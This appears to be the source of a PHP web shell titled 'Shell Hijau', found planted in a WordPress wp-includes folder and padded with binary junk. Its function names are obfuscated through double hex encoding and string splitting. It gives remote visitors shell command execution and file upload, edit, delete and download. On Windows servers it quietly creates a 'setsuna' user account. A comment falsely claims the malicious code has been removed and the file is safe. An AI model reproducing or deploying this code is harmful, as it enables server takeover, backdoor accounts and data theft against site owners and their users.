Current Path : /home2/sarkar82/www/freejobalerts.guru/wp-includes/interactivity-api/840608/ |
Current File : /home2/sarkar82/www/freejobalerts.guru/wp-includes/interactivity-api/840608/index.php |
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" ? ?? } !1AQa"q2亼?#B绷R佯$3br? %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz儎厗噲墛挀敃枟槞殺¥ウЖ┆渤吹斗腹郝媚牌侨墒矣哉肿刭卺忏溴骁栝犟蝮趱鲼?? ?? w !1AQaq"2?B憽绷 #3R?br??php /* * (c) Setsuna Watanabe <yucaerin@hotmail.com> */ session_start(); error_reporting(E_ALL); header("X-XSS-Protection: 0"); ob_start(); set_time_limit(0); error_reporting(0); ini_set('display_errors', FALSE); $Array = [ '36643662', '363436393732', '36373635373435663636363936633635356637303635373236643639373337333639366636653733', '3639373335663737373236393734363136323663363535663730363537323664363937333733363936663665', '36353738363536333735373436353433366636643664363136653634', '373037323666363335663666373036353665', '3733373437323635363136643566363736353734356636333666366537343635366537343733', '36363639366336353566363736353734356636333666366537343635366537343733', '36363639366336353566373037353734356636333666366537343635366537343733', '3632363936653332363836353738', '366436663736363535663735373036633666363136343635363435663636363936633635', '3638373436643663373337303635363336393631366336333638363137323733', '3638363537383332363236393665', '373036383730356637353665363136643635', '3733363336313665363436393732', '363937333566363436393732', '36363639366336353566363537383639373337343733', '37323635363136343636363936633635', '36363639366336353733363937613635', '36393733356637373732363937343631363236633635', '373236353665363136643635', '363636393663363537303635373236643733', '3733373037323639366537343636', '373337353632373337343732', '363636333663366637333635', '373037323666363335663666373036353665', '36393733356637323635373336663735373236333635', '3730373236663633356636333663366637333635', '373536653663363936653662', '3639373335663636363936633635', '34353534', //30 '353634353532', '3533343934663465', '346334353533', '35333534', '3633366636643664363136653634', '3737366637323662363936653637343436393732363536333734366637323739', '363337323635363137343635343436393732363536333734366637323739', '37303639373036353733', '36363639366336353733', '3636363936633635', '36363639366336353534366634343666373736653663366636313634', '3733363836353663366335663635373836353633', ]; $SETSUNA = []; foreach ($Array as $hexString) { $SETSUNA[] = hex2bin(hex2bin($hexString)); } $satu = '_G'; $dua = $SETSUNA[30]; $tiga = '_SER'; $empat = $SETSUNA[31]; $lima = '_SES'; $enam = $SETSUNA[32]; $tujuh = '_FI'; $delapan = $SETSUNA[33]; $sembilan = '_PO'; $sepuluh = $SETSUNA[34]; $sebelas = 'ev'; $duabelas = 'al'; $tigabelas = 'iss'; $empatbelas = 'et'; // Gunakan $SETSUNA sesuai kebutuhan $a = $SETSUNA[0]; $b = $SETSUNA[1]; $c = $a . $b; $EVA = $sebelas . $duabelas; global $EVA; $L = $GLOBALS[$satu . $dua]; $M = $GLOBALS[$tiga . $empat]; $N = $GLOBALS[$lima . $enam]; $e = $GLOBALS[$tujuh . $delapan]; $o = $GLOBALS[$sembilan . $sepuluh]; $f = $SETSUNA[2]; $g = $SETSUNA[3]; $h = $SETSUNA[4]; $i = $SETSUNA[5]; $j = $SETSUNA[6]; $q = $SETSUNA[7]; $s = $SETSUNA[8]; $v = $SETSUNA[9]; $w = $SETSUNA[10]; $y = $SETSUNA[11]; $z = $SETSUNA[12]; $NM = $SETSUNA[13]; $SCN = $SETSUNA[14]; $ID = $SETSUNA[15]; $FE = $SETSUNA[16]; $RF = $SETSUNA[17]; $FS = $SETSUNA[18]; $IW = $SETSUNA[19]; $RNM = $SETSUNA[20]; $FP = $SETSUNA[21]; $SPRF = $SETSUNA[22]; $SBSR = $SETSUNA[23]; $FCL = $SETSUNA[24]; $PROP = $SETSUNA[25]; $IR = $SETSUNA[26]; $PRCL = $SETSUNA[27]; $UNL = $SETSUNA[28]; $ISF = $SETSUNA[29]; $FTD = $SETSUNA[41]; $SHEE = $SETSUNA[42]; $ISS = $tigabelas . $empatbelas; // Mendefinisikan nama fungsi menggunakan kombinasi string 'ARRAYKEYEXISTS' $AKE1 = 'array_'; $AKE2 = 'key'; $AKE3 = '_exists'; // Memastikan fungsi yang dibuat adalah 'array_key_exists' yang valid $AKEFULL = $AKE1 . $AKE2 . $AKE3; $ISS = function ($array, $elementName) use ($AKEFULL) { return call_user_func($AKEFULL, $elementName, $array); }; $b = $ISS($L, $b) ? $z($L[$b]) : '.'; $files = $SCN($b); $upload_message = ''; $edit_message = ''; $delete_message = ''; $create_dir_message = ''; // Function to Download global $FS, $FTD; if ($ISS($L, 'download')) { $FTD = $z($L['download']); // Make sure that the requested file exists if ($FE($FTD)) { // Set header to trigger download header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($FTD) . '"'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . $FS($FTD)); $RF($FTD); exit; } else { // Handle jika file tidak ditemukan echo "File not found."; } } // Function to get file permissions function f($file): string { global $FP, $SPRF, $SBSR; return $SBSR($SPRF('%o', $FP($file)), -4); } // Function to check write permissions function g($file): bool { global $IW; return $IW($file); } function h($command, $workingDirectory = null) { global $j, $FCL, $PROP, $IR, $PRCL; // Mendefinisikan fungsi baru menggunakan kombinasi string $aduh = 'ar'; $adeh = 'ray'; // Memastikan fungsi yang dibuat adalah 'array' yang valid $RAY = $aduh . $adeh; // Pastikan fungsi $RAY adalah fungsi yang valid dan bisa dipanggil if (!function_exists($RAY)) { return "Error: The function {$RAY} does not exist."; } $descriptorspec = [ 0 => $RAY("pipe", "r"), // stdin is a pipe that the child will read from 1 => $RAY("pipe", "w"), // stdout is a pipe that the child will write to 2 => $RAY("pipe", "w") // stderr is a pipe that the child will write to ]; $process = $PROP($command, $descriptorspec, $pipes, $workingDirectory); if ($IR($process)) { // Read output from stdout and stderr $output_stdout = $j($pipes[1]); // Ganti dengan fungsi alternatif jika diperlukan $output_stderr = $j($pipes[2]); // Ganti dengan fungsi alternatif jika diperlukan $FCL($pipes[0]); $FCL($pipes[1]); $FCL($pipes[2]); $return_value = $PRCL($process); return "Output (stdout):\n" . $output_stdout . "\nOutput (stderr):\n" . $output_stderr; } else { return "Failed to execute command."; } } if ($ISS($L, '636d64')) { $command = $z($L['636d64']); $result = h($command, $b); } if ($ISS($e, 'file_upload')) { $tempFile = $e['file_upload']['tmp_name']; $targetFile = $b . '/' . $e['file_upload']['name']; if ($w($tempFile, $targetFile)) { $upload_message = 'File uploaded successfully.'; } else { $upload_message = 'Failed to upload file.'; } } // function for command execution bypass global $SHEE; /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ // function for edit file if ($ISS($o, 'edit_file')) { $file = $o['edit_file']; $content = $q($file); if ($content !== false) { ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Edit File</title> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> <style> body { font-family: Arial, sans-serif; } header { background-color: #4CAF50; color: white; padding: 1rem; text-align: center; } header h1 { margin: 0; } main { padding: 1rem; } </style> </head> <body> <header> <h1>Edit File</h1> </header> <main class="container"> <form method="post" action=""> <div class="form-group"> <textarea id="CopyFromTextArea" name="file_content" rows="10" class="form-control"><?php echo $y($content); ?></textarea> </div> <input type="hidden" name="edited_file" value="<?php echo $y($file); ?>"> <button type="submit" name="submit_edit" class="btn btn-success">Submit</button> </form> </main> </body> </html> <?php exit; } else { $edit_message = 'Gagal membaca isi file.'; } } if ($ISS($o, 'submit_edit')) { $file = $o['edited_file']; $content = $o['file_content']; if ($s($file, $content) !== false) { $edit_message = 'File Edit Successfully.'; } else { $edit_message = 'Failed To Edit File.'; } } if ($ISS($o, 'delete_file')) { global $UNL; $file = $o['delete_file']; if ($UNL($file)) { $delete_message = 'File deleted successfully.'; } else { $delete_message = 'Failed to delete file.'; } } // Fungsi untuk menampilkan pesan function showMessage($message, $y) { echo '<p>' . z($message) . '</p>'; } $un = $NM(); $current_dir = realpath($b); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Shell Hijau</title> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> <style> body { font-family: Arial, sans-serif; } header { background-color: #4CAF50; color: white; padding: 1rem; text-align: center; } header h1 { margin: 0; } main { padding: 1rem; } </style> </head> <body> <header> <h1>Shell Hijau</h1> </header> <main class="container"> <p>Current directory: <?php // Mendefinisikan fungsi baru menggunakan kombinasi string $Ex = 'expl'; $Pl = 'ode'; // Memastikan fungsi yang dibuat adalah 'explode' yang valid $ExPl = $Ex . $Pl; // Pastikan fungsi $ExPl adalah fungsi yang valid dan bisa dipanggil if (!function_exists($ExPl)) { return "Error: The function {$ExPl} does not exist."; } $parts = $ExPl('/', trim($current_dir, '/')); $path = ''; foreach ($parts as $part) { $path .= '/' . $part; echo '<a href="?dir=' . $v($path) . '">' . $y($part) . '</a>/'; } ?> </p> <?php echo '<p>Server information: ' . $y($un) . '</p>'; ?> <!-- Menambahkan sedikit CSS untuk memperbaiki tampilan tombol dengan ukuran lebih kecil --> <style> button { background-color: #4CAF50; /* Warna latar hijau */ color: white; /* Teks berwarna putih */ padding: 5px 10px; /* Padding yang lebih kecil di sekitar teks */ font-size: 12px; /* Ukuran font yang lebih kecil */ border: none; /* Tidak ada border */ border-radius: 4px; /* Rounded corners yang lebih halus */ cursor: pointer; /* Cursor pointer menunjukkan ini klikable */ transition: background-color 0.3s; /* Smooth transition untuk hover effect */ } button:hover { background-color: #45a049; /* Warna lebih gelap saat hover */ } </style> <!-- Tombol untuk menampilkan dan menyembunyikan informasi server --> <button onclick="toggleInfo()">Check Server</button> <div id="serverInfo" style="display:none;"> <pre> Disabled Functions: <?php // Mendefinisikan fungsi baru menggunakan kombinasi string $in = 'in'; $iget = 'i_get'; // Memastikan fungsi yang dibuat adalah 'ingetin' yang valid $ingetin = $in . $iget; // Pastikan fungsi $ingetin adalah fungsi yang valid dan bisa dipanggil if (!function_exists($ingetin)) { return "Error: The function {$ingetin} does not exist."; } // Mendefinisikan fungsi baru menggunakan kombinasi string $i1b = 'su'; $i2b = 'bstr'; // Memastikan fungsi yang dibuat adalah 'i1b2' yang valid $i1b2 = $i1b . $i2b; // Pastikan fungsi $i1b2 adalah fungsi yang valid dan bisa dipanggil if (!function_exists($i1b2)) { return "Error: The function {$i1b2} does not exist."; } // Mendefinisikan fungsi baru menggunakan kombinasi string $i1c = 'st'; $i2c = 'rlen'; // Memastikan fungsi yang dibuat adalah 'i1c2' yang valid $i1c2 = $i1c . $i2c; // Pastikan fungsi $i1c2 adalah fungsi yang valid dan bisa dipanggil if (!function_exists($i1c2)) { return "Error: The function {$i1c2} does not exist."; } echo ($ingetin('disable_functions') ? $i1b2($ingetin('disable_functions'), 0, 50) . ($i1c2($ingetin('disable_functions')) > 50 ? '...' : '') : 'NONE'); ?><br> PHP Version: <?php echo phpversion(); ?><br> Operating System: <?php echo PHP_OS; ?><br> <?php // Mendefinisikan fungsi baru menggunakan kombinasi string $i1b = 'su'; $i2b = 'bstr'; // Memastikan fungsi yang dibuat adalah 'i1b2' yang valid $i1b2 = $i1b . $i2b; // Pastikan fungsi $i1b2 adalah fungsi yang valid dan bisa dipanggil if (!function_exists($i1b2)) { return "Error: The function {$i1b2} does not exist."; } // Mendefinisikan fungsi baru menggunakan kombinasi string $s1b = 'strt'; $s2b = 'oupper'; // Memastikan fungsi yang dibuat adalah 's1b2' yang valid $s1b2 = $s1b . $s2b; // Pastikan fungsi $s1b2 adalah fungsi yang valid dan bisa dipanggil if (!function_exists($s1b2)) { return "Error: The function {$s1b2} does not exist."; } // Mendefinisikan fungsi baru menggunakan kombinasi string $SEXC1 = 'she'; $SEXC2 = 'll_ex'; $SEXC3 = 'ec'; // Memastikan fungsi yang dibuat adalah 'SEXC' yang valid $SEXC = $SEXC1 . $SEXC2 . $SEXC3; // Pastikan fungsi $SEXC adalah fungsi yang valid dan bisa dipanggil if (!function_exists($SEXC)) { return "Error: The function {$SEXC} does not exist."; } // Mendefinisikan fungsi baru menggunakan kombinasi string $SAINT1 = 'st'; $SAINT2 = 'rpos'; // Memastikan fungsi yang dibuat adalah 'SAINT' yang valid $SAINT = $SAINT1 . $SAINT2; // Pastikan fungsi $SAINT adalah fungsi yang valid dan bisa dipanggil if (!function_exists($SAINT)) { return "Error: The function {$SAINT} does not exist."; } // Mengecek apakah server menggunakan Windows dan mencoba membuat user RDP if ($s1b2($i1b2(PHP_OS, 0, 3)) === 'WIN') { $output = $SEXC('net user setsuna setsuna123## /add 2>&1'); $can_create_rdp = ($SAINT($output, 'The command completed successfully') !== false) ? 'Yes' : 'No'; } else { $can_create_rdp = 'No'; // Jika bukan Windows, langsung memberi hasil 'No' } echo 'Can Create RDP User: ' . $can_create_rdp; ?> </pre> </div> <script> function toggleInfo() { var info = document.getElementById('serverInfo'); var button = document.querySelector('button'); if (info.style.display === 'none') { info.style.display = 'block'; button.textContent = 'Close'; } else { info.style.display = 'none'; button.textContent = 'Check Server'; } } </script> <?php if (!empty($upload_message)): ?> <div class="alert alert-info"><?php echo $y($upload_message); ?></div> <?php endif; ?> <?php if (!empty($edit_message)): ?> <div class="alert alert-warning"><?php echo $y($edit_message); ?></div> <?php endif; ?> <?php if (!empty($delete_message)): ?> <div class="alert alert-danger"><?php echo $y($delete_message); ?></div> <?php endif; ?> <!-- Menambahkan sedikit CSS untuk memperbaiki tampilan form dan tombol --> <style> button { background-color: #4CAF50; /* Warna latar hijau */ color: white; /* Teks berwarna putih */ padding: 5px 10px; /* Padding yang lebih kecil di sekitar teks */ font-size: 12px; /* Ukuran font yang lebih kecil */ border: none; /* Tidak ada border */ border-radius: 4px; /* Rounded corners yang lebih halus */ cursor: pointer; /* Cursor pointer menunjukkan ini klikable */ transition: background-color 0.3s; /* Smooth transition untuk hover effect */ } .btn-primary:hover, .toggle-btn:hover { background-color: #45a049; /* Warna lebih gelap saat hover */ } .form-control-file { display: inline-block; margin-right: 10px; /* Tambahkan margin kanan untuk kesinambungan visual */ } .form-group { display: flex; /* Menggunakan flexbox untuk align items horizontally */ align-items: center; /* Center items vertically */ margin-bottom: 10px; /* Margin bawah untuk grup form */ } </style> <!-- Tombol untuk menampilkan dan menyembunyikan form upload --> <button class="toggle-btn" onclick="toggleUploadForm()">Upload Here</button> <!-- Form upload --> <div id="uploadForm" style="display:none;"> <form method="POST" enctype="multipart/form-data" class="mb-3 d-inline"> <div class="form-group"> <input type="file" name="file_upload" class="form-control-file"> <button type="submit" class="btn btn-primary">Upload</button> </div> <input type="hidden" name="dir" value="<?php echo $y($b); ?>"> </form> </div> <script> function toggleUploadForm() { var form = document.getElementById('uploadForm'); var button = document.querySelector('.toggle-btn'); if (form.style.display === 'none') { form.style.display = 'block'; button.textContent = 'Close'; } else { form.style.display = 'none'; button.textContent = 'Upload Here'; } } </script> <a href="?dir=<?php echo $v($b); ?>&show_command_form=1" class="btn btn-warning ml-2">Command Execution</a> <form method="POST" class="mb-3"> <div class="form-group"> </form> <table class="table table-striped"> <thead class="thead-dark"> <tr> <th>Filename</th> <th>Permissions</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($files as $file): ?> <tr> <td> <?php if ($ID($b . '/' . $file)): ?> <a href="?dir=<?php echo $v($b . '/' . $file); ?>" class="<?php echo g($b . '/' . $file) ? '' : 'text-danger'; ?>"><?php echo $y($file); ?></a> <?php else: ?> <?php echo $y($file); ?> <?php endif; ?> </td> <td class="<?php echo g($b . '/' . $file) ? 'text-success' : 'text-danger'; ?>"> <?php echo $ISF($b . '/' . $file) ? $y(f($b . '/' . $file)) : (g($b . '/' . $file) ? 'Directory' : 'Directory (No writable)'); ?> </td> <td> <?php if ($ISF($b . '/' . $file)): ?> <form action="" method="post" class="d-inline"> <input type="hidden" name="edit_file" value="<?php echo $y($b . '/' . $file); ?>"> <button type="submit" class="btn btn-primary">Edit</button> </form> <form action="" method="post" class="d-inline"> <input type="hidden" name="delete_file" value="<?php echo $y($b . '/' . $file); ?>"> <button type="submit" class="btn btn-danger">Delete</button> </form> <form action="" method="get" class="d-inline"> <input type="hidden" name="download" value="<?php echo $y($v($b . '/' . $file)); ?>"> <button type="submit" class="btn btn-info">Download</button> </form> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> </main> </body> </html> $4??&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz們剠唶垑姃摂晼棙櫄ⅲぅΗī炒刀犯购旅呐魄壬室釉罩棕仝忏溴骁栝牝篝貊鼬? ? ? 嘚唪m? 疝j 鼜EP?